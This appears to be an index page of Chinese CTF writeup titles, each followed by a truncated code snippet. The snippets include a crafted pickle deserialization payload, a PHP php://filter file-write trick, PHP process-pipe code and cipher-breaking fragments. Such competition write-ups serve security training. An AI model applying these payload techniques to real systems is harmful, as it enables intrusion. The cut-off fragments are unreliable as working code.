程序開了沙箱, 只能採用open, read, write來列印flag或者利用lgx::http::send_file函數來獲取flag。v1[2].m128i_i16[0] = 32034; v3 = v8; v1[1] = v2; v9 = v5; *((_BYTE *)v5 + (_QWORD)v3) = 0; v4 = *((_QWORD *)this + 9) == 0LL; v5 = &v7; LODWORD(v7) = 1836345390; -
GACTF Writeup By V&N(MISC部分)
uint32_t const key[4]){ uint32_t y, z, sum; unsigned p, rounds, e; if (n > 1) /* Coding Part */ { rounds = 6 + 52 / n; sum = 0; z = origin[n - 1]; -
2019高校運維賽writeup
e = 65537c = pow(m,e,n)with open("enc","wb") as f:f.write(str(c))f.write("\n")f.write(str(expass(bypassDF)開局一個後門<? -
De1CTF2020-WriteUp上(Web、Misc、Pwn)
\n"); var_dump(fread($pipes[1], 1024)); var_dump(fread($pipes[1], 1024)); var_dump(fread($pipes[1], 1024)); fclose($pipes[0]); fclose($pipes[1]); $return_value -
WMCTF-WriteUp
phpunlink('1aa');$c="%B3%B1%0F%F0%08PH-K%CC%D1P%89ww%0D%89VJ%CEMQ%8A%D5%B4%B6%B7%03";echo urldecode($c)."\n";unlink('aaa');$content='php://filter/write=resource=2222<? -
西湖論劍2019 WriteUp
Web4 blog原題:https://ctftime.org/writeup/10369同年Google CTF另外的幾個題目:https://otakekumi.github.io/2018/07/04/GoogleCTF-2018-Writeup-JsSafe-Translate-catChat-gCalc -
全國大學生信息安全競賽初賽writeup
圖片這裡看到父進程要退出,子進程變成孤兒進程時pid會變為1,也就是要子進程暫停住,使用 pcntl_wait 就可以掛起子進程,讓pid變成1.Payload: ?圖片看到命令執行的地方發現是zzzphp1.6.1的漏洞,但是題目改了過濾的函數 -
CTF系列 1 密碼題解密網站總結(必收藏乾貨)
://rumkin.com/tools/cipher/morse.php (空格用斜槓表示)16.quipqiuphttps://www.xarg.org/tools/caesar-cipher/https://quipqiup.com/17.與佛論禪http://www.keyfc.net/bbs/tools/tudoucode.aspx18.xxencode(Ri64NjS0 -
極客大挑戰2020 官方Write-up
構造opcode:b'c__main__\nsecret\n}(Vname\nVf4de\nub0c__main__\nYourSecret\n)\x81}(Vname\nVf4de\nub.'exp如下:import pickleimport pickletoolsimport base64opcode = b'c__main__\nsecret\n}(Vname\nVf4de\nub0c__main__\nYourSecret\n)\x81}(Vname\nVf4de\nub.' -
2020N1CTF kemu
當時N1CTF kemu沒做出來,而且沒找到詳細的writeup,於是前段時間無聊的時候把它翻出來研究了一下。 -
GACTF Writeup By星盟安全團隊
(message),16): p.append(message[i:i+16])#print(p)cc=[]c4 = decrypt_cipherblock(c[4], c[5], p[5])#print(c4)c[4]=c4c3 = decrypt_cipherblock(c[3],c[4], p[4] )